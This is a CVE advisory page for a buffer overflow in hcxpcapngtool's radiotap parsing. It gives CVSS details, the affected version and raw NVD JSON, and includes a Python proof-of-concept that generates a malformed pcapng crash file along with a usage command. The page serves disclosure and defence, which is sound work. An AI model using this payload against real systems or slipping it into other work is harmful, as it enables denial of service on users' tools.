Security Vulnerability Report
CVE-2026-29976 CVSS 6.2 MEDIUM

CVE-2026-29976

Published: 2026-03-26 15:16:36
Last Modified: 2026-04-02 19:37:58

Description

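Buffer Overflow vulnerability in ZerBea hcxpcapngtool v. 7.0.1-43-g2ee308e allows a local attacker to obtain sensitive information via the getradiotapfield() function. Note that the CVSS vector recorded below rates confidentiality and integrity impact as None and availability impact as High, which corresponds to a denial of service rather than information disclosure; the description and the score disagree on this point, so confirm the actual impact against the referenced upstream issue before triaging.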

CVSS Details

CVSS Score
6.2
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:zerbea:hcxtools:7.0.1:*:*:*:*:*:*:* - VULNERABLE
ZerBea hcxtools v. 7.0.1-43-g2ee308e

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import struct

# Simplified sample generator from the CVE-2026-29976 write-up. It emits a small
# pcapng-style file (section header, interface description, one enhanced packet)
# whose packet payload begins with a radiotap header declaring a length of
# 0xFFFF, far more than the bytes that follow it.
#
# NOTE(review): not validated here against the affected hcxpcapngtool build. The
# declared block lengths are fixed values (or a fixed offset plus the payload
# size) rather than being measured from the emitted bytes, so check the output
# against the upstream report (https://github.com/ZerBea/hcxtools/issues/365)
# before relying on it as a regression or detection sample.
#
# Defensive takeaway: a radiotap parser has to bound the header's self-declared
# length by the captured packet length before walking any fields.


def generate_malformed_pcapng(filename):
    """Write the three-block sample capture to *filename* and print a summary.

    Args:
        filename: Path of the file to create; it is opened in binary write
            mode, so an existing file at that path is overwritten.

    The function returns nothing. It prints a confirmation line and a usage
    hint that both include *filename*.
    """
    # Section Header Block: block type, declared total length, byte-order
    # magic, version 1.0, a 32-bit "unspecified" section length, and the
    # declared total length repeated.
    section_header = b"".join(
        (
            b"\x0A\x0D\x0D\x0A",
            struct.pack("<I", 28),
            b"\x1A\x2B\x3C\x4D",
            struct.pack("<HHI", 1, 0, 0xFFFFFFFF),
            struct.pack("<I", 28),
        )
    )

    # Interface Description Block: type 1, declared length 20, link type 1
    # (labelled Ethernet on the page), reserved 0, snap length 0, length again.
    interface_block = struct.pack("<IIHHII", 1, 20, 1, 0, 0, 20)

    # Packet payload: radiotap version 0, pad 0, 16-bit length 0xFFFF, then
    # 100 filler bytes. The declared header length exceeds the payload size.
    radiotap_payload = b"\x00\x00\xFF\xFF" + b"A" * 100
    payload_size = len(radiotap_payload)
    declared_block_len = 20 + payload_size

    # Enhanced Packet Block: type 6, declared length, interface 0, both
    # timestamp halves all-ones, captured and original length, the payload,
    # and the declared length repeated as the trailer.
    packet_block = b"".join(
        (
            struct.pack(
                "<IIIIIII",
                6,
                declared_block_len,
                0,
                0xFFFFFFFF,
                0xFFFFFFFF,
                payload_size,
                payload_size,
            ),
            radiotap_payload,
            struct.pack("<I", declared_block_len),
        )
    )

    with open(filename, 'wb') as out:
        out.write(section_header + interface_block + packet_block)

    print(f"[+] Malformed pcapng file generated: {filename}")
    print("[+] Usage: ./hcxpcapngtool -o output.pcap " + filename)


if __name__ == "__main__":
    generate_malformed_pcapng('exploit.pcapng')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-29976", "sourceIdentifier": "[email protected]", "published": "2026-03-26T15:16:36.137", "lastModified": "2026-04-02T19:37:58.263", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Buffer Overflow vulnerability in ZerBea hcxpcapngtool v. 7.0.1-43-g2ee308e allows a local attacker to obtain sensitive information via the getradiotapfield() function"}, {"lang": "es", "value": "Vulnerabilidad de desbordamiento de búfer en ZerBea hcxpcapngtool v. 7.0.1-43-g2ee308e permite a un atacante local obtener información sensible a través de la función getradiotapfield()"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-120"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:zerbea:hcxtools:7.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "AA1414B9-89D6-48FB-890E-F8C4A5985AA8"}]}]}], "references": [{"url": "https://github.com/ZerBea/hcxtools/issues/365", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}]}}